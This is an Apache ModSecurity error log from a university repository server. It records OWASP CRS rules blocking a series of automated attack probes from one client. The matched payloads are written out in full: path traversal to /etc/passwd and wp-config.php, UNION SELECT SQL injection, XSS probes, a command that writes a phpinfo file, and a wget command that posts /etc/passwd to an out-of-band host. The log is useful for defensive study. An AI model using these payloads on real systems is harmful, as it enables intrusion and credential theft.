[Tue Aug 29 11:46:33.424924 2023] [:error] [pid 2253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:picUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../ found within ARGS:picUrl: ./../config/database.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/public/index.php/material/Material/_download_imgage"] [unique_id "ZO14KcCo-f0AAAjN0M0AAAAU"]
[Tue Aug 29 11:46:33.429055 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:target: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14KcCo-f0AAAib56MAAAAA"]
[Tue Aug 29 11:46:34.439750 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:InternalFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:InternalFile: ../../../../../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO14KsCo-f0AAAhrqSoAAAAo"]
[Tue Aug 29 11:46:35.431103 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:REINDEX:phpcli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22<? found within ARGS:REINDEX:phpcli: echo \\x22<?php phpinfo();\\x22 > /var/www/html/magmi/web/info.php; php "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ZO14K8Co-f0AAAjH@ugAAAAI"]
[Tue Aug 29 11:46:39.435772 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/usr-cgi/logdownload.cgi"] [unique_id "ZO14L8Co-f0AAAhzvlwAAAAx"]
[Tue Aug 29 11:46:41.390697 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:name: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/webapi/file/transfer"] [unique_id "ZO14McCo-f0AAAfEB-oAAAAO"]
[Tue Aug 29 11:46:42.480269 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14MsCo-f0AAAhrqT4AAAAo"]
[Tue Aug 29 11:46:43.668586 2023] [:error] [pid 2231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/manage_user.php"] [unique_id "ZO14M8Co-f0AAAi3Z04AAAAP"]
[Tue Aug 29 11:46:47.463664 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:refurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: }}}; found within ARGS:refurl: }}};alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/owa/auth/frowny.aspx"] [unique_id "ZO14N8Co-f0AAAfECAEAAAAO"]
[Tue Aug 29 11:46:50.420765 2023] [:error] [pid 2253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:id: -1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14OsCo-f0AAAjN0QEAAAAU"]
[Tue Aug 29 11:46:52.491331 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/sites/all/modules/avatar_uploader/lib/demo/view.php"] [unique_id "ZO14PMCo-f0AAAh4DhEAAAA2"]
[Tue Aug 29 11:46:55.095383 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/execute_cmd.cgi"] [unique_id "ZO14P8Co-f0AAAjcHVkAAAAY"]
[Tue Aug 29 11:47:01.374977 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14RcCo-f0AAAjIhmcAAAAJ"]
[Tue Aug 29 11:47:01.395059 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZO14RcCo-f0AAAjIhmgAAAAJ"]
[Tue Aug 29 11:47:02.552023 2023] [:error] [pid 2231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:partcode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);{/ found within ARGS:partcode: {dede:field name='source' runphp='yes'}echo md5(\\x22CVE-2018-7700\\x22);{/dede:field}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/tag_test_action.php"] [unique_id "ZO14RsCo-f0AAAi3Z3kAAAAP"]
[Tue Aug 29 11:47:03.439112 2023] [:error] [pid 2253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:likebtn_q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:likebtn_q: aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14R8Co-f0AAAjN0RcAAAAU"]
[Tue Aug 29 11:47:05.490158 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:filename: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/download"] [unique_id "ZO14ScCo-f0AAAjIhncAAAAJ"]
[Tue Aug 29 11:47:06.435689 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Rule 7fe1c6360a88 [id "981242"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "237"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjM7DQAAAAT"]
[Tue Aug 29 11:47:06.435761 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjM7DQAAAAT"]
[Tue Aug 29 11:47:07.506600 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:open. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:open: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php"] [unique_id "ZO14S8Co-f0AAAjKyvwAAAAQ"]
[Tue Aug 29 11:47:07.646924 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:name[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:name[]: $(wget --post-file /etc/passwd cjmnbitjmimt14dgn26gwwumz6395qafq.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/api/getServices"] [unique_id "ZO14S8Co-f0AAAjqDDAAAAAH"]
[Tue Aug 29 11:47:11.021610 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:value: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/api/change_setting"] [unique_id "ZO14T8Co-f0AAAjcHYAAAAAY"]
[Tue Aug 29 11:47:11.363375 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ found within ARGS:fn: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/cs/career/getSurvey.jsp"] [unique_id "ZO14T8Co-f0AAAjkM1UAAAAI"]
[Tue Aug 29 11:47:13.428259 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:libpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:libpath: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZO14UcCo-f0AAAfECCsAAAAO"]
[Tue Aug 29 11:47:14.387192 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14UsCo-f0AAAhzvqwAAAAx"]
[Tue Aug 29 11:47:15.436013 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 6' UNION ALL SELECT md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/requests/take_action.php"] [unique_id "ZO14U8Co-f0AAAhl0HcAAAAi"]
[Tue Aug 29 11:47:16.387651 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14VMCo-f0AAAjCbFAAAAAB"]
[Tue Aug 29 11:47:16.440608 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,2,3,4,5,6,md5(999999999),8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/manage_booking.php"] [unique_id "ZO14VMCo-f0AAAjKywwAAAAQ"]
[Tue Aug 29 11:47:18.659089 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14VsCo-f0AAAh133IAAAAz"]
[Tue Aug 29 11:47:19.537932 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dt: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cWindows\\x5c\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/XmlPeek.aspx"] [unique_id "ZO14V8Co-f0AAAjdQNUAAAAZ"]
[Tue Aug 29 11:47:19.575805 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14V8Co-f0AAAjCbFgAAAAB"]
[Tue Aug 29 11:47:22.592272 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{alert(document.domain)}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS_NAMES:{alert(document.domain)}: {alert(document.domain)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO14WsCo-f0AAAkBKlkAAAAb"]
[Tue Aug 29 11:47:23.389970 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.action"] [unique_id "ZO14W8Co-f0AAAjZRZ4AAAAS"]
[Tue Aug 29 11:47:25.416044 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XcCo-f0AAAj114wAAAAa"]
[Tue Aug 29 11:47:25.506422 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:file: /../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/components/com_moofaq/includes/file_includer.php"] [unique_id "ZO14XcCo-f0AAAjL8UIAAAAR"]
[Tue Aug 29 11:47:26.411931 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XsCo-f0AAAhT4A4AAAAD"]
